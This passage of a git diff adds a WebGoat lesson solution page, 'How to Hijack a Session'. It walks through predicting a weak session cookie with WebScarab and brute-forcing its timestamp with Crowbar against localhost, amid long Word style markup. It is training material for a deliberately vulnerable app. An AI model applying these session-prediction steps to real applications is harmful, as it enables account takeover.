+   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 5"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 6"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 6"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
+  <w:LsdException Locked="false" Priority="19" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
+  <w:LsdException Locked="false" Priority="21" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
+  <w:LsdException Locked="false" Priority="31" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
+  <w:LsdException Locked="false" Priority="32" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
+  <w:LsdException Locked="false" Priority="33" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
+  <w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
+  <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
+ </w:LatentStyles>
+</xml><![endif]-->
+<style>
+<!--
+ /* Font Definitions */
+ @font-face
+	{font-family:Wingdings;
+	panose-1:5 0 0 0 0 0 0 0 0 0;
+	mso-font-charset:2;
+	mso-generic-font-family:auto;
+	mso-font-pitch:variable;
+	mso-font-signature:0 268435456 0 0 -2147483648 0;}
+@font-face
+	{font-family:"MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-alt:"\FF2D\FF33 \660E\671D";
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+@font-face
+	{font-family:"Cambria Math";
+	panose-1:2 4 5 3 5 4 6 3 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:roman;
+	mso-font-pitch:variable;
+	mso-font-signature:-1610611985 1107304683 0 0 159 0;}
+@font-face
+	{font-family:Tahoma;
+	panose-1:2 11 6 4 3 5 4 4 2 4;
+	mso-font-charset:0;
+	mso-generic-font-family:swiss;
+	mso-font-pitch:variable;
+	mso-font-signature:1627400839 -2147483648 8 0 66047 0;}
+@font-face
+	{font-family:"\@MS Mincho";
+	panose-1:2 2 6 9 4 2 5 8 3 4;
+	mso-font-charset:128;
+	mso-generic-font-family:modern;
+	mso-font-pitch:fixed;
+	mso-font-signature:-1610612033 1757936891 16 0 131231 0;}
+ /* Style Definitions */
+ p.MsoNormal, li.MsoNormal, div.MsoNormal
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+h1
+	{mso-style-unhide:no;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 1 Char";
+	mso-style-next:Normal;
+	margin-top:12.0pt;
+	margin-right:0cm;
+	margin-bottom:3.0pt;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	page-break-after:avoid;
+	mso-outline-level:1;
+	font-size:16.0pt;
+	font-family:"Arial","sans-serif";
+	mso-fareast-font-family:"MS Mincho";
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+h2
+	{mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-qformat:yes;
+	mso-style-link:"Heading 2 Char";
+	mso-style-next:Normal;
+	margin-top:10.0pt;
+	margin-right:0cm;
+	margin-bottom:0cm;
+	margin-left:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan lines-together;
+	page-break-after:avoid;
+	mso-outline-level:2;
+	font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+p.MsoCaption, li.MsoCaption, div.MsoCaption
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-next:Normal;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;}
+a:link, span.MsoHyperlink
+	{mso-style-noshow:yes;
+	color:blue;
+	text-decoration:underline;
+	text-underline:single;}
+a:visited, span.MsoHyperlinkFollowed
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	color:purple;
+	mso-themecolor:followedhyperlink;
+	text-decoration:underline;
+	text-underline:single;}
+p
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-margin-top-alt:auto;
+	margin-right:0cm;
+	mso-margin-bottom-alt:auto;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"Balloon Text Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-fareast-font-family:"Times New Roman";}
+span.Heading1Char
+	{mso-style-name:"Heading 1 Char";
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 1";
+	mso-ansi-font-size:16.0pt;
+	mso-bidi-font-size:16.0pt;
+	font-family:"MS Mincho";
+	mso-ascii-font-family:"MS Mincho";
+	mso-fareast-font-family:"MS Mincho";
+	mso-hansi-font-family:"MS Mincho";
+	mso-bidi-font-family:Arial;
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+span.Heading2Char
+	{mso-style-name:"Heading 2 Char";
+	mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 2";
+	mso-ansi-font-size:13.0pt;
+	mso-bidi-font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+span.BalloonTextChar
+	{mso-style-name:"Balloon Text Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Balloon Text";
+	mso-ansi-font-size:8.0pt;
+	mso-bidi-font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-ascii-font-family:Tahoma;
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:Tahoma;
+	mso-bidi-font-family:Tahoma;}
+.MsoChpDefault
+	{mso-style-type:export-only;
+	mso-default-props:yes;
+	font-size:10.0pt;
+	mso-ansi-font-size:10.0pt;
+	mso-bidi-font-size:10.0pt;
+	mso-ascii-font-family:Arial;
+	mso-fareast-font-family:Calibri;
+	mso-fareast-theme-font:minor-latin;
+	mso-hansi-font-family:Arial;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+@page Section1
+	{size:612.0pt 792.0pt;
+	margin:72.0pt 72.0pt 72.0pt 72.0pt;
+	mso-header-margin:35.4pt;
+	mso-footer-margin:35.4pt;
+	mso-paper-source:0;}
+div.Section1
+	{page:Section1;}
+-->
+</style>
+<!--[if gte mso 10]>
+<style>
+ /* Style Definitions */
+ table.MsoNormalTable
+	{mso-style-name:"Table Normal";
+	mso-tstyle-rowband-size:0;
+	mso-tstyle-colband-size:0;
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
+	mso-para-margin:0cm;
+	mso-para-margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Arial","sans-serif";
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:shapedefaults v:ext="edit" spidmax="3074"/>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+</head>
+
+<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
+
+<div class=Section1>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Lesson
+Plan Title:</span></b><span style='font-family:"Arial","sans-serif"'> How to
+Hijack a Session<o:p></o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Concept /
+Topic To Teach:</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<!-- Start Instructions -->
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Application
+developers who develop their own session IDs frequently forget to incorporate
+the complexity and randomness necessary for security. If the user specific
+session ID is not complex and random, then the application is highly
+susceptible to session-based brute force attacks. <o:p></o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>General
+Goal(s):</span></b><span style='font-family:"Arial","sans-serif"'> <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Try to access
+an authenticated session belonging to someone else. <o:p></o:p></span></p>
+
+<!-- Stop Instructions -->
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>In this
+lesson the purpose is to predict the WEAKID value. The WEAKID is used to
+differentiate authenticated and anonymous users of WebGoat.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
+yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600"
+ o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f"
+ stroked="f">
+ <v:stroke joinstyle="miter"/>
+ <v:formulas>
+  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+  <v:f eqn="sum @0 1 0"/>
+  <v:f eqn="sum 0 0 @1"/>
+  <v:f eqn="prod @2 1 2"/>
+  <v:f eqn="prod @3 21600 pixelWidth"/>
+  <v:f eqn="prod @3 21600 pixelHeight"/>
+  <v:f eqn="sum @0 0 1"/>
+  <v:f eqn="prod @6 1 2"/>
+  <v:f eqn="prod @7 21600 pixelWidth"/>
+  <v:f eqn="sum @8 21600 0"/>
+  <v:f eqn="prod @7 21600 pixelHeight"/>
+  <v:f eqn="sum @10 21600 0"/>
+ </v:formulas>
+ <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+ <o:lock v:ext="edit" aspectratio="t"/>
+</v:shapetype><v:shape id="Picture_x0020_785" o:spid="_x0000_i1034" type="#_x0000_t75"
+ style='width:480pt;height:276.75pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/WeakSessionID_files/image001.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/WeakSessionID_files/image020.jpg" v:shapes="Picture_x0020_785"><![endif]></span><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b><span style='font-family:"Arial","sans-serif"'>Solution:</span></b><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The easiest
+way to complete this lesson is to use WebScarab’s Session ID Analysis.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Go to
+WebScarab and click on the button “SessionID Analysis”. Select the last POST
+request from the “Previous requests” drop-down box.<o:p></o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_786"
+ o:spid="_x0000_i1033" type="#_x0000_t75" style='width:480pt;height:276.75pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/WeakSessionID_files/image003.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/WeakSessionID_files/image021.jpg" v:shapes="Picture_x0020_786"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>1</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> WebScarabs SessionID Analysis<span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>To make sure
+that WebScarab is able to fetch the WEAKID cookie, you need to click the “Test”
+button on the bottom of the screen. A pop-up window must be shown like below.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_787"
+ o:spid="_x0000_i1032" type="#_x0000_t75" style='width:480pt;height:276pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/WeakSessionID_files/image005.png" o:title="" cropbottom="2719f"/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=368
+src="/WebGoat/lesson_solutions/WeakSessionID_files/image022.jpg" v:shapes="Picture_x0020_787"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>2</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> SessionID WEAKID discovered<span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>If you don’t
+have a pop-up window with the Extracted Sessionids, you must edit the Request.
+You must delete the WEAKID value from the request. Without this cookie value,
+WebGoat will return a HTTP Header “Set-Cookie: WEAKID=value” so WebScarab
+learns about this value.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Fetch 50
+samples and examine the results. Enter “50” in the “Samples” window and click
+the button “Fetch”. You will not see any information about progress.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_788" o:spid="_x0000_i1031"
+ type="#_x0000_t75" style='width:480pt;height:17.25pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/WeakSessionID_files/image007.png" o:title="" croptop="61471f"/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=23
+src="/WebGoat/lesson_solutions/WeakSessionID_files/image023.jpg" v:shapes="Picture_x0020_788"><![endif]></span><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Now you need
+to go to the tab “Analysis”.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_789" o:spid="_x0000_i1030"
+ type="#_x0000_t75" style='width:480pt;height:53.25pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/WeakSessionID_files/image007.png" o:title="" cropbottom="52914f"/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=71
+src="/WebGoat/lesson_solutions/WeakSessionID_files/image024.jpg" v:shapes="Picture_x0020_789"><![endif]></span><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>In the “Analysis”
+pane you see nothing. <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_790" o:spid="_x0000_i1029"
+ type="#_x0000_t75" style='width:480pt;height:276.75pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/WeakSessionID_files/image010.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/WeakSessionID_files/image025.jpg" v:shapes="Picture_x0020_790"><![endif]></span><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>You must
+select the Session Identifier WEAKID value from the drop-down box.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_791" o:spid="_x0000_i1028"
+ type="#_x0000_t75" style='width:480pt;height:276.75pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/WeakSessionID_files/image012.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=369
+src="/WebGoat/lesson_solutions/WeakSessionID_files/image026.jpg" v:shapes="Picture_x0020_791"><![endif]></span><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>The WEAKID is
+divided in 2 parts: the first part is an identifier that is added 1 in every
+cookie and a time value. The time value is calculated at the moment that you
+submit the request.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Notice that
+there is sometimes a gap in the first value of the WEAKID, skipping with 1. The
+value that is missing is the value that you need to know to log on. Now you
+only need to calculate the timestamp. This can be brute-forced using Crowbar.
+You know the previous timestamp and the next timestamp so you have a start and
+end value.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
+yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_792" o:spid="_x0000_i1027"
+ type="#_x0000_t75" style='width:480.75pt;height:338.25pt;visibility:visible;
+ mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/WeakSessionID_files/image014.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=641 height=451
+src="/WebGoat/lesson_solutions/WeakSessionID_files/image027.jpg" v:shapes="Picture_x0020_792"><![endif]></span><span
+style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>There is a
+value 16935 and a value 16937 with a numeric difference of 28110 instead of
+14109, so there the WEAKID cookie is located. Copy and paste the raw HTTP
+request in Crowbar:<o:p></o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_793"
+ o:spid="_x0000_i1026" type="#_x0000_t75" style='width:447pt;height:382.5pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/WeakSessionID_files/image016.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=596 height=510
+src="/WebGoat/lesson_solutions/WeakSessionID_files/image028.jpg" v:shapes="Picture_x0020_793"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>3</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Crowbar<span style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Change target
+to localhost and the port to 80.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Create a Base
+response. Make sure that you see “How to hijack a session” in the middle
+window.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Insert ##1##
+in the WEAKID parameter where you want to brute-force the value. Start the
+first loop at 363093, the last digits of the last cookie before the
+authentication cookie and 363203, the first cookie after the authentication
+cookie. We have to brute-force these values, but we are sure that they lie
+between these two boundaries.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Examine the
+results until you see a different fuzzy logic value (the blue line </span><span
+style='font-family:Wingdings;mso-ascii-font-family:Arial;mso-hansi-font-family:
+Arial;mso-bidi-font-family:Arial;mso-char-type:symbol;mso-symbol-font-family:
+Wingdings'><span style='mso-char-type:symbol;mso-symbol-font-family:Wingdings'>J</span></span><span
+style='font-family:"Arial","sans-serif"'>), right-click it and click on “Show
+reply”.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid'><span style='font-family:
+"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_794"
+ o:spid="_x0000_i1025" type="#_x0000_t75" style='width:481.5pt;height:345.75pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/WeakSessionID_files/image018.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=642 height=461
+src="/WebGoat/lesson_solutions/WeakSessionID_files/image029.jpg" v:shapes="Picture_x0020_794"><![endif]></span></p>
+
+<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
+field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
+<span style='mso-element:field-separator'></span><![endif]--><span
+style='mso-no-proof:yes'>4</span><!--[if supportFields]><span style='mso-element:
+field-end'></span><![endif]--> Lesson 12 Completed<span style='font-family:
+"Arial","sans-serif"'><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><o:p>&nbsp;</o:p></p>
+
+</div>
+<table align='RIGHT' cellspacing='0' width='90%' border='0' cellpadding='0'>
+	<tr>
+		<td valign='MIDDLE' width='100%' align='RIGHT class=MsoNormal' style='font-family:"Arial","sans-serif"'>
+			Solution by Erwin Geirnaert 
+		</td>
+		<td valign='MIDDLE' align='RIGHT'><img hspace='0' vspace='0' border='0' alt='ZION SECURITY' src='images/logos/zionsecurity.gif'></td>
+	</tr>
+</table>
+
+</body>
+
+</html>
diff --git a/main/project/WebContent/lesson_solutions/WeakSessionID_files/colorschememapping.xml b/main/project/WebContent/lesson_solutions/WeakSessionID_files/colorschememapping.xml
new file mode 100644
index 000000000..b200daa38
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/WeakSessionID_files/colorschememapping.xml
@@ -0,0 +1,2 @@
+<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
